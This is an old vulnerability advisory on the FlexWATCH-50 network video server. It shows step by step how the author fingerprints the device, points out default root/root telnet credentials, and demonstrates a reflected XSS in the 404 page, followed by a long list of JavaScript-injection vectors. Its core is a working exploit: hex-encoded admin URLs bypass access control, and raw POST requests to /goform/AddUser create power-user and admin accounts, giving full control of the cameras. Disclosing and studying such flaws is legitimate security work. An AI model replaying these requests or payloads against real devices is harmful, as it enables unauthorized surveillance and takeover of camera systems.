#=============================================================
#  Unauthorized Access vulnerability in FlexWATCH camera Server 
#                      Second Assault !
#============================================================= 


Author: SLAIZER 
mail: slaizer[at]phreaker.net

Vendor : SEYEON Technology
System : FlexWATCH Network Video Server
url :  http://www.flexwatch.com/
Mail:  sytech@seyeon.co.kr

Protuct Version : FlexWATCH-50 Web Ver 2.2 tested Build Nov 18 2003

#====================
#  Introduction
#====================

A few months ago I published another document , explaining how to obtain entire access
to the system of easy and fast form.
The same document was sent to SEYEON before being published , since I did not obtain
response of them , I decided to publish it. Two months after having being published ,
SEYEON got in touch with me. They asked me that test a new system already patched to
the bug , in order that I was saying to them that bugs had found .
They demanded me that it should remove the name of the company of my previus document 
and thet he should not publish any more...
In addition to realizing a work to the company with many economic benefits of completely
free form , thing that I do not accept . I will always be ready to help to whom I needed 
it from free form where as I'm not demanded anything and much less I use propietary 
software. I'm sorry that it seems to be exagerate but nobody lives of the air.


#===================
#  Description 
#===================
 
愁o examining the new system!

slaizer@Necora:~$ echo -e "HEAD / HTTP/1.0\n\n" | nc victim 80

HTTP/1.0 302 Redirect
Server: FlexWATCH-Webs  <---------- :) the same everlasting banner
Date: Mon Dec  1 01:01:26 2003
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://victim/index.htm
Age: 1
 

弒n another version do not examine the services use , becouse I did not need it :P.

root@Necora:~$ nmap -sS -P0 victim 
Interesting ports on victim (censured :P):

PORT      STATE    SERVICE
21/tcp    open     ftp      <------- 
23/tcp    open     telnet   <-------  Default user/pass are root/root :P 
80/tcp    open     http     <-------  They are not also very interesting right now , 
1024/tcp  open     kdm      <-------  but with the nice thing that is to use ssl :P.
1755/tcp  open     wms      <-------  



弒t's time to see web application :

惹ailing along the web we think that the system has changed a bit as for the tree of 
 directories , but for the rest it seems to be equal .
 
The first thing what we meet is a bug in the application entrusted to notify to us 
that url to which we eant to accede doesn't exist ( 404 error ) , a piece of XSS :P .

Cross-Site Scripting .

 Example :

   mozilla http://victim/hehe.html<H1><script>alert('Security?');</script>

   Results :

    Access Error: Page not found 
    
    when trying to obtain /hehe.html
    
    cannot open URL /hehe.html

  ( The code is executed perfectly even two times are executed .. hehe . Turning out
    be of that time two windows alerting us with the message -Security ? ).
  
 View source :

   <html>
       <head>
          <title>Document Error: Page not found</title>
       </head>
      <body>
      <h2>Access Error: Page not found</h2>
      when trying to obtain <b>/hehe.html<h1><script>alert('Security ?');</script></b>
      <br><p>Cannot open URL <b>/hehe.html<h1><script>alert('Security ?');</script></b></p>
      </body>
   </html>

Note: 

This type of methods is well-known to gain access to the system by means of links malicious
to do with the identification of some user .
document.write / document.cookie / document.location..


I expose different methods of injection Javascript extracted of Globbes Security Advisory #33:

  <a href="javas&#99;ript&#35;[code]">
  <div onmouseover="[code]">
  <img src="javascript:[code]">
  <img dynsrc="javascript:[code]"> [IE]
  <input type="image" dynsrc="javascript:[code]"> [IE]
  <bgsound src="javascript:[code]"> [IE]
  &<script>[code]</script>
  &{[code]}; [N4]
  <img src=&{[code]};> [N4]
  <link rel="stylesheet" href="javascript:[code]">
  <iframe src="vbscript:[code]"> [IE]
  <img src="mocha:[code]"> [N4]
  <img src="livescript:[code]"> [N4]
  <a href="about:<s&#99;ript>[code]</script>">
  <meta http-equiv="refresh" content="0;url=javascript:[code]">
  <body onload="[code]">
  <div style="background-image: url(javascript:[code]);">
  <div style="behaviour: url([link to code]);"> [IE]
  <div style="binding: url([link to code]);"> [Mozilla]
  <div style="width: expression([code]);"> [IE]
  <style type="text/javascript">[code]</style> [N4]
  <object classid="clsid:..." codebase="javascript:[code]"> [IE]
  <style><!--</style><script>[code]//--></script>
  <![CDATA[<!--]]><script>[code]//--></script>
  <!-- -- --><script>[code]</script><!-- -- -->
  <script>[code]</script>
  <img src="blah"onmouseover="[code]">
  <img src="blah>" onmouseover="[code]">
  <xml src="javascript:[code]">
  <xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml>
  <div datafld="b" dataformatas="html" datasrc="#X"></div>
  [\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]

   
愁here has always to be verified the information that the client sends to the Servant , in this 
 case the most obvius serious solution to verify that malicious characters are not inserted
 as for example substituing to their html equivalent.




------------ u0xa ---------------



嫂t the moment where I want to come it's to this url : admin/aindex.htm .
 That is where one finds the system-administration , so trying and using
 imagination I verify that it happens on having sent the request in hexadecimal format.

Example :



slaizer@Necora:~$ ./urlhex.pl  http://victim/admin/aindex.htm

------------ Url encode to hex mode ----------------

 http://victim/%61%64m%69n/a%69nde%78.%68t%6D

-----------------By SLAIZER tools ------------------

I obtain this in text plain :


------ code -----
<html>
<head>
<script language="Javascript">
     onBlur=self.focus()
</script>
<frameset cols="196,*" framespacing="0" frameborder="0">
  <frame src="admin.htm" name="menu_frame" id="menu_frame" scrolling="Auto" marginwidth="0" marginheight="0">
  <frame src="videocfg.htm" name="main_frame" id="tool_frame" scrolling="Auto" marginwidth="10" marginheight="0">
   </frameset>
</head>
</html>
----- code -----



:D It's my friend the frame of configuracion and it's in plain text ..
We go for good way we are going to look if we can do something with this.

 
slaizer@Necora:~$ ./urlhex.pl http://victim/admin/admin.htm 

------------ Url encode to hex mode ----------------

http://victim/adm%69%6E/%61%64%6D%69n.%68tm

-----------------By SLAIZER tools ------------------


Here it is where we go away to centre  , so we are going to see it!.

Important links :
  _______________________
 |-Change Root           | <---- /asp/pwdcfg.asp
 |Password configuration | 
 |                       |
 |-Add User              | <---- /asp/adduser.asp /* Let's go! */
 |                       |
 |-Delete User           | <---- /asp/deluser.asp
 |                       |
 |-Access Level          | <---- /asp/chglimit.asp
 |_______________________| 



slaizer@Necora:~$ nc victim 80 

POST /goform/AddUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://victim/adm%69n/a%73%70/a%64duser.%61%73p   <----/*This is a /admin/asp/adduser.asp hex-encoded*/
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 152
Pragma: no-cache
 
RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&password=root123
&passconf=root123&group=POWER_USER&enabled=on&ok=OK


----------- u0xa ------------

<br>User, "slaizer" is successfully added.<br><br>User configuration is successfully saved.<br></font></b>


----------- u0xa ------------



It seems that there is post correctly , but on having tried login shows us this error directly :

   Access Error: Forbidden

   When trying to obtain /admin/aindex.htm
   Access Denied Prohibited User .

   -------------------------------


foh....but ... I login in :

	   http://victim/app/idxas.html   <----- Camera Administration. 

Login : slaizer
password: root123
 

|o_O| <-hehe !! We already have access to all Cameras!!! using the login slaizer with pass root123 
	        that we add in the previous setp. We have already given a great steo improve.. 


But...The solution is simpler than seems.. the added user belongs to POWER_USER , earlier 
having this user really more sufficient , but it is enought to us to done one more test but
add another user to the group of ADMIN :

Example

slaizer@Necora:~$ nc victim 80 

POST /goform/AddUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://victim/adm%69n/a%73%70/a%64duser.%61%73p   <----/*This is a /admin/asp/adduser.asp hex-encoded*/
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 147
Pragma: no-cache
 
RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=rezials&password=123root
&passconf=123root&group=ADMIN&enabled=on&ok=OK




----------- u0xa ------------

<br>User, "rezials" is successfully added.<br><br>User configuration is successfully saved.<br></font></b>


----------- u0xa ------------

At the moment ok! .


I use login rezials & password 123root and..... :D Congratulations! you Are ADMIN!!!

You can already do what you want in the system!!!
 
The problem was becouse the directory /admin was already not allowin him access to the users as previously
it was happening.


#=========================
# Solution : 
#=========================


Always verify the type of request that the client realizes, since you can see I have used a miscellany of 
code hexadeciaml and ascii .
The best solution is to create meetings of identification and to allow the access to such directories for 
the meeting.

/* Note : login in www.flexwatch.com as technic e-mail suport... xD */


#========================
# GreetSssSss!!!
#========================

- gyorgyo - Makensi - palako - overpower - zapper - sha0 - IaM - phiber - kanutron - TaYoKeN - plAnadeCu - 
  
- kicat - AbeToRiuS - M0RGAN - ZeroQ ...........! xD
 [[Irc-Hispano : #boinasnegras , #ngsec]]